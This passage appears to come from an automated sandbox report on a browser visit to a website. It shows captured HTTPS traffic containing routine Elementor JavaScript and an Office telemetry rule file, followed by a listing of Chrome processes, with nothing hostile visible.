                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5fccc820b76-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC878INData Raw: 35 35 30 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 65 6c 65 6d 65 6e 74 6f 72 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 35 37 5d 2c 7b 31 33 32 37 3a 28 65 2c 74 29 3d 3e 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 76 6f 69 64 20 30 3b 63 6c 61 73 73 20 54 65 78 74 45 64 69 74 6f 72 20 65 78 74 65 6e 64 73 20 65 6c 65 6d 65 6e 74 6f 72 4d 6f 64 75 6c 65 73 2e 66 72 6f
                                                                                                                                                                                                                              Data Ascii: 550/*! elementor - v3.24.0 - 09-10-2024 */"use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[357],{1327:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class TextEditor extends elementorModules.fro
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC489INData Raw: 74 20 65 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 70 61 72 61 67 72 61 70 68 3b 69 66 28 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 74 3d 65 2e 68 74 6d 6c 28 29 2e 72 65 70 6c 61 63 65 28 2f 26 6e 62 73 70 3b 2f 67 2c 22 20 22 29 2c 72 3d 74 2e 6d 61 74 63 68 28 2f 5e 20 2a 28 5b 5e 20 5d 20 3f 29 2f 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 70 3d 72 5b 31 5d 2c 73 3d 70 2e 74 72 69 6d 28 29 3b 69 66 28 22 3c 22 3d 3d 3d 73 29 72 65 74 75 72 6e 3b 74 68 69 73 2e 64 72 6f 70 43 61 70 4c 65 74 74 65 72 3d 70 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 73 2e 24 64 72 6f 70 43 61 70 4c 65 74 74 65 72 2e 74 65 78 74 28 73 29 3b 63 6f 6e 73 74 20 61 3d 74 2e 73 6c 69 63 65 28 70 2e 6c 65 6e 67 74 68 29 2e 72 65
                                                                                                                                                                                                                              Data Ascii: t e=this.elements.$paragraph;if(!e.length)return;const t=e.html().replace(/&nbsp;/g," "),r=t.match(/^ *([^ ] ?)/);if(!r)return;const p=r[1],s=p.trim();if("<"===s)return;this.dropCapLetter=p,this.elements.$dropCapLetter.text(s);const a=t.slice(p.length).re
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              149192.168.2.64988713.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:14 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                              x-ms-request-id: 34547014-f01e-003f-75cc-20d19d000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180414Z-r1755647c66ww2rh494kknq3r000000009a0000000008f54
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:14 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:14:03:52
                                                                                                                                                                                                                              Start date:23/10/2024
                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                              Start time:14:03:55
                                                                                                                                                                                                                              Start date:23/10/2024
                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2296,i,3073160073782762063,5984773800657840567,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                              Start time:14:03:57
                                                                                                                                                                                                                              Start date:23/10/2024
                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.tacinc.org"
                                                                                                                                                                                                                              Imagebase:0x7ff684c40000
                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              No disassembly